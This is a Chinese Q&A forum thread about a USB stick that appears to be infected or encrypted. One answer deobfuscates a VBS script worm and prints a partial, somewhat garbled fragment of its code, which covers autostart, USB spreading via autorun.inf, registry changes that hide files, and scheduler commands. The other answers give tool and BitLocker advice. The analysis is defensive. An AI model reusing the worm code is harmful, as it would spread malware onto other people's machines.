U盘求解密
发布网友
发布时间:2022-05-13 08:31
我来回答
共4个回答
热心网友
时间:2024-02-22 11:22
你好
这个是vbs脚本病毒,看上去是乱码,一点也看不懂,其实还是有迹可循的。其思路就是寻 找"execute"关键词。病毒最终,还是要换成机器可以看懂的内容,也就是说,最后一层的execute里面的内容,就是病毒的源代码。按照这个思路,那么可以知道,解密方法也一定就在这个execute里面。
也就是说:无需明白他是如何加密的,只需要知道,execute出来的是什么。
按照这个思路,可以得到程序的最后一次迭代加密过程前的代码,也就是第一次迭代解密的代码,看上去还是乱码,不过还是同样的道理,总可以找到execute这个关键词。病毒可能经过多次迭代,不过最终还是可以看懂的。
需要注意的是,execute后面的内容解密出来如果真的用execute执行了,那就中招了,所以这里要注意不能把execute也放进去一起执行。
以下是我的解密最终代码片断
这个程序作者比较BT,手工加密了很多地方,还手工打乱了代码,严重妨碍了程序可读性。
分析完代码其大致功能是
1。开机自启动
2。U盘的感染
3。破坏系统隐藏功能
on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromwin32_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schele'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)&j:dir=fso.getspecialfolder(1)&j
tmp=fso.getspecialfolder(2)&j:wbe=dir&"wbem\":mir=left(ouw,len(ouw)-len (wscript.scriptname))
cnr="\computername":cnp="HKLM\system\currentcontrolset\control"&cnr&cnr&cnr:cna=rr (cnp,0):if cna="" then cna=til
wsc="wscript.exe":csc="cscript.exe":css=csc&" //nologo ":wsr=rn&":createobject (""wscript.shell"").run"
c=vbcrlf:inc=til&c&"[autorun]"&c&"open="&wsc&" .\"&vs&c&"shell\open\command="&wsc&" .\"&vs&c&"shell\open\default=1"
sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr ("HKCU"&rop&sf&"desktop",0)&j
rpa="HKLM\software\"&cna&j:fsp=rr("HKLM"&rop&sf&"common startup",0)&j&vs:fap=rr ("HKCU"&rop&sf&"favorites",0)&j
ht=ec("ivwt?56"):ha=ec(":;9:7>5kw9"):hb=hl&"1;<<=6x"&hl&"r;":hc="0dwuEpE":hd=ec
("$"+hc):he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\":rsb=rsp&"run\":rsp=rsp&"policies\explorer\run\"&cna
hip="HKCU"&rop&"advanced\showsuperhidden":sz=lcase(fso.getfilename(wscript.fullname)):if mir=dir then sys=true
for each si in
sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
if instr(wv,"5.2")<>0 then hb="w"+hb:lb="v" else if os<>2052 and cc<>86 then
hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=d&j then ws.run "explorer "&d,3,false:bir=true
next
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):ver=gv(ouw):if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1
else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run css&dir&ve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)<>til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)>50 and lb<>"o" then wr "osw",4
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
le=rr("dna",1):if ei(tmp&le,1) then ws.run tmp&le
cu:er 10
else
wscript.sleep 5000
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)<>1 or pr(wsc,1)=0 then bf dir&ve,ouc,7:ws.run css&dir&ve,0,false
end if
if pa=1 then rna=rpa&rna
rr=ws.regread(rna)
if er(0) then rr=0
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
由于VBS与JS一样是解释型语言,代码自上而下,一行一行地运行。所以解这类代码的一个技巧是:
我们寻找解密入口点时,应该优先考虑最后一个execute。作者大量使用逻辑拼接。。。属于很BT的加密。。。汗水...
追问你写的这个太复杂了,看不懂啊,不知道怎么处理啊。
热心网友
时间:2024-02-22 11:22
可以上网下一个查U盘心片的小软件,查一下是什么芯片的,再上网下一个该芯片的产量工具,把U盘产量一次,在产量的时候就不要设密码了,以后这个U盘就没有密码了。
热心网友
时间:2024-02-22 11:22
看什么牌子的,一般官网都会有解密软件下载。 下个破了就行。
热心网友
时间:2024-02-22 11:23
量产吧 下载一个量产工具
如何解除u盘上的密码
选择U盘并关闭BitLocker:在BitLocker驱动器加密设置中,找到已加密的U盘,点击“关闭BitLocker”。系统可能会要求你输入解锁密码或密钥,按照提示操作即可。等待解密完成:解密过程可能需要一些时间,期间不要移除U盘或关闭电脑。解密完成后,U盘将不再被加密,你可以自由访问其中的数据。二、使用第三方加密软件...
如何解密u盘中的加密数据?
方法一:1、使用BitLocker解密的磁盘很简单,选择关闭Bitlocker,弹出一个“关闭Bitlocker”对话框,点击“解密驱动器”,将出现正在解密对话框。2、出现解密之后,不一会儿,就可以解密成功了。方法二:1、打开控制面板–进入bitlocker磁盘加密。2、选中启用加密的分区,点击关闭bitlocker。3、接着会提醒您输入...
怎么给U盘解除密码?
给U盘解除密码,通常可以通过以下几种方法来实现:使用Windows操作系统自带的工具、第三方软件或者U盘加密软件自带的解密功能。首先,如果U盘是使用Windows操作系统自带的BitLocker功能进行加密的,解除密码就相对简单。用户只需插入加密的U盘,然后在Windows资源管理器中找到该U盘,右键点击选择“管理BitLocker...
怎样破解u盘密码加密
1、以管理员身份运行BitLocker分区恢复软件;2、点击主页面中“Bitlocker分区解密”或则是在“恢复Bitlocker分区”页面中选择“Bitlocker分区解密;3、“从磁盘解密”中选择目标磁盘D盘;4、填写好“导出路径”和“解密密钥”,点击“开始解密&...
怎么解密u盘的加密
1.打开“控制面板-系统和安全-BitLocker 驱动器加密“,里面有关闭BitLocker 加密;2.启动了 win7 系统 自带的bitlocker功能,可以对磁盘进行加密;3.设置删除的话,打开控制面板-系统和安全-Bitlocker驱动器加密找到相应的盘 在其后面 点击 “关闭 bitlocker”然后系统自动开始解密;4.注意完成后重新...
u盘加密怎么解除(电脑文件加密)
紧接着,跳转到新窗口,找到并点击“解锁驱动器”按钮。随后,在弹出的窗口中输入用于解锁的密码,并点击“解锁”。在返回的窗口中,选择点击“关闭bitlocker”。紧接着,返回之前的窗口,点击“解密驱动器”按钮。之后,耐心等待解密过程的完成,期间请勿拔出u盘。当解密完成,系统会弹出提示框,点击“...
U盘被加密怎么解除
1. **使用操作系统自带工具**:如果U盘是通过Windows系统的BitLocker功能加密的,可以通过以下步骤解除加密:将U盘插入电脑,打开“控制面板”,选择“系统和安全”下的“BitLocker驱动器加密”,在加密的U盘项中点击“关闭BitLocker”,按照提示输入解锁密码或密钥,等待解密完成即可。2. **使用第三方加密...
u盘忘记密码怎么解除
首先,可以尝试利用专业的密码破解软件。这些软件在网络上能找到,它们具备强大的解密功能。请确保选择可信的软件,以确保数据安全。其次,如果对数据安全不那么敏感,可以选择重新格式化U盘。这将消除密码,但同时会删除U盘上的所有内容,因此在操作前务必备份重要文件。另外,如果你的U盘是由知名厂商生产的,...
如何解密加密过的u盘呢
首先,将U盘插入电脑并确保能被识别。然后,在Windows系统中,通过“控制面板”进入“系统和安全”选项,选择“BitLocker驱动器加密”。在加密设置中,找到已加密的U盘,点击“关闭BitLocker”。系统会提示输入解锁密码或密钥,按照提示操作即可。等待解密过程完成,期间不要移除U盘或关闭电脑。如果U盘是通过第...
如何解密u盘
解密U盘的方法主要取决于U盘是如何被加密的。以下是两种常见情况及相应的解密方法:1. **使用Windows系统自带BitLocker加密的U盘**:- 将加密的U盘插入电脑并确保电脑能识别。- 打开“控制面板”,选择“系统和安全”,然后进入“BitLocker驱动器加密”设置。- 在加密设置中,找到已加密的U盘,点击“关闭...
